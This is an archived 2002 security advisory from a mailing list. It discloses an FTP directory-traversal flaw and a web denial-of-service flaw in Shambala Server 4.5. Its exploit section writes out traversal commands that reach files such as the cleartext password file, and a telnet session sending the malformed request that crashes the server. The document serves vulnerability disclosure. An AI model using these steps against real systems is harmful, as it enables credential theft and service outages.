[NT] Shambala Server Directory Traversal and DoS
From: support@securiteam.comDate: 06/01/02
- Previous message: support@securiteam.com: "[UNIX] Mnews Local and Remote Overflow Vulnerabilities"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sat, 1 Jun 2002 22:59:11 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Shambala Server Directory Traversal and DoS
------------------------------------------------------------------------
SUMMARY
<Shttp://www.evolvable.com/> Shambala Server is a personal Web/FTP server
for Win 9*/NT. When the web server is started, it also starts the
integrated FTP server. The product has been found to contain multiple
vulnerabilities.
DETAILS
Vulnerable systems:
Shambala Server version 4.5
The integrated FTP server is vulnerable to a directory traversal attack
that enables attackers to view the entire directory structure and download
any file in it. There is also a DoS condition present in the web server.
Impact:
An authenticated user may view any directory and/or download any file on
the system. An authenticated user may use this to download the cleartext
password file that lies one ".." below the web root.
Exploit:
Directory traversal / get any file
ftp> ls ../../../ - and so on...
ftp> get ../../../ - and so on...
DoS condition in the Web server
you# telnet 192.168.0.11 80
Trying 192.168.0.11...
Connected to 192.168.0.11.
Escape character is '^]'.
GET !"#¤%&/()=?
Connection closed by foreign host.
you#
ADDITIONAL INFORMATION
The information has been provided by <mailto:exce@netwinder.nu> Daniel
Nyström.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Mnews Local and Remote Overflow Vulnerabilities"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
